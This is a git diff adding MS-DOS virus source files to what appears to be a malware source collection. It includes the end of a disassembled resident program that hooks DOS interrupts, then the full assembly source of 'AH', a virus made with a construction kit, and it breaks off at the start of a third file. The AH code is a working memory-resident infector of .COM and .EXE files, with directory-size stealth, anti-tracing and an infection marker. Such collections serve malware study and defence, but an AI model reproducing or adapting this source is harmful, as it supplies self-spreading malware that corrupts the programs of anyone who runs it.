bx,0FFFFh + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ax,4800h + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + retn +sub_4 endp + + db 0CBh + db 26 dup (90h) + +; +; SUBROUTINE +; + +sub_5 proc near + mov cx,10h + mov si,offset data_15 ; (936E:0120=9Dh) + mov di,data_9e ; (936E:00F0=0) + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp cx,data_25 ; (936E:05D1=7BCh) + ja loc_38 ; Jump if above + jc loc_36 ; Jump if carry Set + cmp dx,data_26 ; (936E:05D3=701h) + ja loc_38 ; Jump if above +loc_36: + cmp cx,data_27 ; (936E:05D5=7BCh) + ja loc_39 ; Jump if above + jc loc_37 ; Jump if carry Set + cmp dx,data_28 ; (936E:05D7=501h) + ja loc_39 ; Jump if above +loc_37: + mov ax,0 + jmp short loc_40 ; (0487) +loc_38: + or ax,0F0h +loc_39: + or ax,0Fh +loc_40: + mov data_29,al ; (936E:05D9=0) + push dx + push cx + xor bx,bx ; Zero register + call sub_6 ; (04A5) + pop cx + pop dx + mov bx,data_6e ; (936E:0002=0) + call sub_6 ; (04A5) + mov ah,1 + add data_22,ah ; (936E:05CC=14h) + nop + retn +sub_5 endp + + db 90h, 90h, 90h, 90h + +; +; SUBROUTINE +; + +sub_6 proc near + add dl,data_24[bx] ; (936E:05CE=0) + cmp dl,20h ; ' ' + jbe loc_41 ; Jump if below or = + add dh,1 + sub dl,20h ; ' ' +loc_41: + add dh,data_23[bx] ; (936E:05CD=6) + cmp dh,0Bh + jbe loc_42 ; Jump if below or = + sub dh,0Bh + add cx,1 +loc_42: + add bx,bx + nop + mov data_26[bx],dx ; (936E:05D3=701h) + mov data_25[bx],cx ; (936E:05D1=7BCh) + retn +sub_6 endp + +loc_43: + push ax + mov al,3Fh ; '?' + mov dx,70h + out dx,al ; port 70h, RTC addr/enabl NMI + mov dx,71h + in al,dx ; port 71h, RTC clock/RAM data + cmp al,0F0h + jbe loc_44 ; Jump if below or = + jmp loc_47 ; (057B) +loc_44: + mov ax,357Fh + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ax,ds + mov es,ax + cmp bx,0FFFFh + jne loc_45 ; Jump if not equal + jmp loc_48 ; (0582) +loc_45: + mov dx,0FFFFh + mov ax,257Fh + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_35,bx ; (936E:05E4=138Dh) + mov word ptr data_35+2,es ; (936E:05E6=28Ch) + mov ax,es + mov ds,ax + mov dx,bx + mov ax,257Eh + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,cs + mov es,ax + mov ds,ax + mov dx,offset int_21h_entry + mov ax,2521h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_37,bx ; (936E:05E8=4EBh) + mov word ptr data_37+2,es ; (936E:05EA=0A10h) + mov ax,es + mov ds,ax + mov dx,bx + mov ax,25FDh + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,cs + mov es,ax + mov ds,ax + mov dx,offset int_24h_entry + mov ax,2524h + mov ds:data_7e,dx ; (936E:0012=0) + mov ds:data_8e,ds ; (936E:0014=936Eh) + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + call sub_5 ; (0450) + call sub_4 ; (0410) + nop + nop + nop + nop + nop +loc_46: + mov cx,80h + mov di,data_47e ; (93CE:0600=41h) + mov si,data_5e ; (936E:0000=0) + cld ; Clear direction + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + mov ax,ds + add ax,60h + mov word ptr ds:[579h],ax ; (936E:0579=0E64h) + nop + nop + mov es,ax + mov ds,ax + pop ax + nop + nop +;* jmp far ptr loc_1 ;*(0E64:0100) + db 0EAh, 00h, 01h, 64h, 0Eh +loc_47: + mov dx,data_46e ; (93CE:05B0=41h) + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_48: + mov ax,4A00h + mov bx,5Fh + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,ds:data_45e ; (93CE:002C=0FFFFh) + sub bx,1 + xor ax,ax ; Zero register + mov ds,bx + mov ds:data_48e,ax ; (FFFE:0001=0) + mov bx,cs + add bx,60h + mov dx,cs + sub dx,1 + mov ds,dx + mov ds:data_4e,bx ; (936D:0001=0FFFFh) + mov ah,50h ; 'P' + int 21h ; DOS Services ah=function 50h + ; set active PSP segmnt from bx + push cs + pop ds + jmp short loc_46 ; (0559) + db 'load error', 0Dh, 0Ah, '$' + db 0Ah, '$' + db 0 +data_20 db 'COMMAND.' +data_21 db 43h + db 4Fh, 4Dh, 00h +data_22 db 14h +data_23 db 6 ; Data table (indexed access) +data_24 db 0 ; Data table (indexed access) + db 4, 0 +data_25 dw 7BCh ; Data table (indexed access) +data_26 dw 701h ; Data table (indexed access) +data_27 dw 7BCh +data_28 dw 501h +data_29 db 0 +data_30 db 0FFh +data_31 dw 0A10h +data_32 dw 743h +data_33 dw 3D7Bh +data_34 dw 7B6Eh + db 90h +data_35 dd 28C138Dh +data_37 dd 0A1004EBh +data_39 dw 20h + db 90h, 90h, 4Dh, 10h, 0Ah,0FFh + db 0Fh + db 11 dup (90h) + db 0E9h,0CCh, 03h, 90h, 90h, 90h + db 90h, 90h, 9Ch, 50h, 31h,0C0h + db 2Eh, 38h, 26h,0DAh, 05h, 75h + db 07h +loc_49: + pop ax + popf ; Pop flags + jmp cs:data_37 ; (936E:05E8=4EBh) + cmp di,0 + jne loc_49 ; Jump if not equal + pop ax + popf ; Pop flags + mov ax,3 + iret ; Interrupt return + db 90h, 90h, 90h, 00h, 90h, 00h + db 0FFh,0FFh,0FFh,0FFh,0FFh, 9Ch + db 80h,0FCh, 4Eh, 75h, 02h,0EBh + db 1Ch, 80h,0FCh, 4Bh, 75h, 02h + db 0EBh, 15h +loc_50: + cmp ah,0Eh + jne loc_51 ; Jump if not equal + jmp short loc_53 ; (0654) +loc_51: + cmp ah,40h ; '@' + jne loc_52 ; Jump if not equal + jmp short loc_53 ; (0654) +loc_52: + popf ; Pop flags + jmp cs:data_35 ; (936E:05E4=138Dh) + db 90h +loc_53: + cli ; Disable interrupts + push es + push ds + push di + push si + push bp + push dx + push cx + push bx + push ax + mov cs:data_31,ss ; (936E:05DB=0A10h) + mov cs:data_32,sp ; (936E:05DD=743h) + mov al,0FFh + mov cs:data_30,al ; (936E:05DA=0FFh) + mov ax,3524h + int 7Eh ; ??INT Non-standard interrupt. + cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) + jne loc_54 ; Jump if not equal + mov ax,2524h + mov dx,108h + push cs + pop ds + int 7Eh ; ??INT Non-standard interrupt. +loc_54: + sti ; Enable interrupts + jmp short loc_56 ; (06AA) +loc_55: + cli ; Disable interrupts + xor ax,ax ; Zero register + mov cs:data_30,ah ; (936E:05DA=0FFh) + mov ss,cs:data_31 ; (936E:05DB=0A10h) + mov sp,cs:data_32 ; (936E:05DD=743h) + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es + popf ; Pop flags + sti ; Enable interrupts + jmp cs:data_35 ; (936E:05E4=138Dh) + db 90h +loc_56: + pop ax + pop bx + push bx + push ax + cmp ah,4Bh ; 'K' + je loc_61 ; Jump if equal + cmp ah,40h ; '@' + jne loc_57 ; Jump if not equal + jmp short loc_60 ; (06CC) +loc_57: + cmp ah,0Eh + jne loc_58 ; Jump if not equal + jmp short loc_55 ; (0687) +loc_58: + cmp ah,4Eh ; 'N' + jne loc_55 ; Jump if not equal + jmp short loc_55 ; (0687) + db 90h +loc_59: + jmp loc_62 ; (0783) +loc_60: + mov ax,0Fh + cmp cs:data_29,al ; (936E:05D9=0) + jb loc_55 ; Jump if below + ja loc_59 ; Jump if above + cmp bx,4 + jbe loc_55 ; Jump if below or = + mov bx,1 + push cs + pop ds + add ds:data_11e,bx ; (936E:00FA=0) + mov ah,2Ch ; ',' + int 7Eh ; ??INT Non-standard interrupt. + cmp dh,ds:data_11e ; (936E:00FA=0) + ja loc_55 ; Jump if above + mov bx,data_3e ; (0A10:000E=1) + add bx,data_32 ; (936E:05DD=743h) + mov ss:[bx],bx + jmp short loc_55 ; (0687) + db 01h, 90h, 90h, 90h +loc_61: + jmp loc_63 ; (1A7F) + db 'Hello - Copyright S & S Internat' + db 'ional, 1990', 0Ah, 0Dh, '$' + db 1Ah, 41h, 41h + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAA' +loc_62: + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAA' +loc_63: + mov ah,9 + mov dx,offset data_14 ; (936E:0103=90h) + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + int 20h ; Program Terminate + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ah.asm b/MSDOS/Virus.MSDOS.Unknown.ah.asm new file mode 100644 index 00000000..b0f9551c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ah.asm @@ -0,0 +1,415 @@ +; AH.asm : Mess with White Shark and you'll be eaten alive! +; Created with Biological Warfare - Version 0.90 by MnemoniX + +PING equ 0AE8Eh +PONG equ 0A09Eh +STAMP equ 31 +MARKER equ 05753h + +code segment + org 0 + assume cs:code,ds:code + +start: + db 0E9h,3,0 ; to virus +host: + db 0CDh,20h,0 ; host program +virus_begin: + call $ + 3 ; BP is instruction ptr. + pop bp + sub bp,offset $ - 1 + + push ds es + + cli + mov ax,PING ; mild anti-trace code + push ax + pop ax + dec sp + dec sp + pop bx + cmp ax,bx + je no_trace + hlt + +no_trace: + sti + in al,21h ; lock out & reopen keyboard + xor al,2 + out 21h,al + xor al,2 + out 21h,al + + mov ax,PING ; test for residency + int 21h + cmp bx,PONG + je installed + + mov ax,es ; Get PSP + dec ax + mov ds,ax ; Get MCB + + sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64 + sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64 + mov es,word ptr ds:[12h] + + push cs ; copy virus into memory + pop ds + xor di,di + mov si,bp + mov cx,(virus_end - start) / 2 + 1 + rep movsw + + xor ax,ax ; capture interrupts + mov ds,ax + + sub word ptr ds:[413h],(MEM_SIZE+1023) / 1024 + + mov si,21h * 4 ; get original int 21 + mov di,offset old_int_21 + movsw + movsw + + mov word ptr ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es ; and set new int 21 + +installed: + call activate ; activation routine + + pop es ds ; restore segregs + cmp sp,MARKER ; check for .EXE + je exe_exit + +com_exit: + lea si,[bp + host] ; restore host program + mov di,100h + push di + movsw + movsb + + call fix_regs ; fix up registers + ret ; and leave +exe_exit: + mov ax,ds ; fix up return address + add ax,10h + push ax + add ax,cs:[bp + exe_cs] + mov cs:[bp + return_cs],ax + + mov ax,cs:[bp + exe_ip] + mov cs:[bp + return_ip],ax + + pop ax + add ax,cs:[bp + exe_ss] ; restore stack + cli + mov ss,ax + mov sp,cs:[bp + exe_sp] + + call fix_regs ; fix up registers + sti + + db 0EAh ; back to host program +return_ip dw 0 +return_cs dw 0 + +exe_cs dw -16 ; orig CS:IP +exe_ip dw 103h +exe_sp dw -2 ; orig SS:SP +exe_ss dw -16 + +fix_regs: + xor ax,ax + cwd + xor bx,bx + mov si,100h + xor di,di + xor bp,bp + ret + +; interrupt 21 handler +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,PING ; residency test + je ping_pong + cmp ah,11h ; directory stealth + je dir_stealth + cmp ah,12h + je dir_stealth + cmp ah,4Eh ; directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + cmp ah,3Dh ; file open + je file_open + cmp ax,4B00h ; execute program + jne int_21_exit + jmp execute +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +ping_pong: + mov bx,PONG + iret + +dir_stealth: + call int_21 ; get dir entry + test al,al + js dir_stealth_done + + push ax bx es + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 +no_ext_FCB: + mov ax,es:[bx + 17h] ; check for infection marker + and al,31 + cmp al,STAMP + jne dir_fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Fh],0 +dir_fixed: + pop es bx ax +dir_stealth_done: + iret + +dir_stealth_2: + pushf + call dword ptr cs:[old_int_21] + jc dir_stealth_done_2 + +check_infect2: + push ax bx es + + mov ah,2Fh + int 21h + mov ax,es:[bx + 16h] + and al,31 ; check timestamp + cmp al,STAMP + jne fixed_2 + + sub es:[bx + 1Ah],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Ch],0 + +fixed_2: + pop es bx ax + clc ; clear carry +dir_stealth_done_2: + retf 2 + +file_open: + push ax cx di es + call get_extension + cmp [di],'OC' ; .COM file? + jne perhaps_exe ; perhaps .EXE then + cmp byte ptr [di + 2],'M' + jne not_prog + jmp a_program +perhaps_exe: + cmp [di],'XE' ; .EXE file? + jne not_prog + cmp byte ptr [di + 2],'E' + jne not_prog +a_program: + pop es di cx ax + jmp execute ; infect file +not_prog: + pop es di cx ax + jmp int_21_exit + +execute: + push ax bx cx dx si di ds es + + xor ax,ax ; critical error handler + mov es,ax ; routine - catch int 24 + mov es:[24h * 4],offset int_24 + mov es:[24h * 4 + 2],cs + + mov ax,4300h ; change attributes + int 21h + + push cx dx ds + xor cx,cx + call set_attributes + + mov ax,3D02h ; open file + call int_21 + jc cant_open + xchg bx,ax + + push cs ; CS = DS + pop ds + + mov ax,5700h ; save file date/time + int 21h + push cx dx + mov ah,3Fh + mov cx,28 + mov dx,offset read_buffer + int 21h + + cmp word ptr read_buffer,'ZM' ; .EXE? + je infect_exe ; yes, infect as .EXE + + mov al,2 ; move to end of file + call move_file_ptr + + sub dx,VIRUS_SIZE + 3 ; check for previous infection + cmp dx,word ptr read_buffer + 1 + je dont_infect + + add dx,VIRUS_SIZE + 3 + mov word ptr new_jump + 1,dx + + mov dx,offset read_buffer ; save original program head + int 21h + mov ah,40h ; write virus to file + mov cx,VIRUS_SIZE + mov dx,offset virus_begin + int 21h + + xor al,al ; back to beginning of file + call move_file_ptr + + mov dx,offset new_jump ; and write new jump + int 21h + +fix_date_time: + pop dx cx + and cl,-32 ; add time stamp + or cl,STAMP ; for directory stealth + mov ax,5701h ; restore file date/time + int 21h + +close: + pop ds dx cx ; restore attributes + call set_attributes + + mov ah,3Eh ; close file + int 21h + +cant_open: + pop es ds di si dx cx bx ax + jmp int_21_exit ; leave + + +set_attributes: + mov ax,4301h + int 21h + ret + +dont_infect: + pop cx dx ; can't infect, skip + jmp close + +move_file_ptr: + mov ah,42h ; move file pointer + cwd + xor cx,cx + int 21h + + mov dx,ax ; set up registers + mov ah,40h + mov cx,3 + ret +infect_exe: + cmp word ptr read_buffer[16],MARKER + je dont_infect ; infected already + + les ax,dword ptr read_buffer[20] + mov exe_cs,es ; CS + mov exe_ip,ax ; IP + + les ax,dword ptr read_buffer[14] + mov exe_ss,ax ; SS + mov exe_sp,es ; SP + mov word ptr read_buffer[16],MARKER + + mov ax,4202h ; to end of file + cwd + xor cx,cx + int 21h + + push ax dx ; save file size + + push bx + mov cl,12 ; calculate offsets for CS + shl dx,cl ; and IP + mov bx,ax + mov cl,4 + shr bx,cl + add dx,bx + and ax,15 + pop bx + + sub dx,word ptr read_buffer[8] + mov word ptr read_buffer[22],dx + mov word ptr read_buffer[20],ax + add dx,100 + mov word ptr read_buffer[14],dx + + pop dx ax ; calculate prog size + + add ax,VIRUS_SIZE + 3 + adc dx,0 + mov cx,512 ; in pages + div cx ; then save results + inc ax + mov word ptr read_buffer[2],dx + mov word ptr read_buffer[4],ax + + mov ah,40h + mov cx,VIRUS_SIZE + 3 + mov dx,offset virus_begin + int 21h + + + mov ax,4200h ; back to beginning + cwd + xor cx,cx + int 21h + + mov ah,40h ; and fix up header + mov cx,28 + mov dx,offset read_buffer + int 21h + jmp fix_date_time ; done + +courtesy_of db '[BW]',0 +signature db 'Mess with White Shark and you'll be eaten alive!',0 + + +activate: + ; Insert your routine here + ret +get_extension: + push ds ; find extension + pop es + mov di,dx + mov cx,64 + mov al,'.' + repnz scasb + ret +int_24: + mov al,3 ; int 24 handler + iret +new_jump db 0E9h,0,0 + +virus_end: +VIRUS_SIZE equ virus_end - virus_begin +read_buffer db 28 dup (?) ; read buffer + +end_heap: + +MEM_SIZE equ end_heap - start + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ahadisk.asm b/MSDOS/Virus.MSDOS.Unknown.ahadisk.asm new file mode 100644 index 00000000..41a32c37 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ahadisk.asm @@ -0,0 +1,4042 @@ + +PAGE 59,132 + +; +; +; AHADISK +; +; Created: 29-Feb-92 +; Passes: 5 Analysis Options on: none +; +; + +data_1e equ 0 +data_2e equ 1 +data_3e equ 3 +data_4e equ 94h +keybd_flags_1_ equ 417h +dsk_recal_stat_ equ 43Eh +dsk_motor_stat_ equ 43Fh +dsk_motor_tmr_ equ 440h +video_mode_ equ 449h +video_port_ equ 463h +timer_low_ equ 46Ch +hdsk0_media_st_ equ 490h +data_16e equ 1000h ;* +data_17e equ 0 ;* +data_18e equ 3 ;* +data_234e equ 7C3Eh ;* + +;-------------------------------------------------------------- seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a + + +; +; +; Program Entry Point +; +; + + +ahadisk proc far + +start: + jmp loc_262 +data_24 db 0, 0 +data_25 dw 0 +data_26 dw 0 +data_27 dw 0 +data_28 db 0 +data_29 db 0 +data_30 db 0 + db 0 +data_31 dw 1 +data_32 db 19h + db 0 +data_33 db ' ', 0 + db 27h, 0 + db '.', 0 + db ' 360 K', 0 + db ' 1.2 M', 0 + db ' 720 K', 0 + db '1.44 M', 0 +data_37 db 0FFh + db 11h,0FFh +data_38 db 1Dh + db 0FFh, 11h,0FFh, 23h +data_39 db 1 + db 0, 2, 0 +data_40 db 23h + db 00h, 3Bh, 00h, 23h, 00h, 47h + db 00h +data_41 db 2 + db 1, 2 +data_42 db 1 +data_43 db 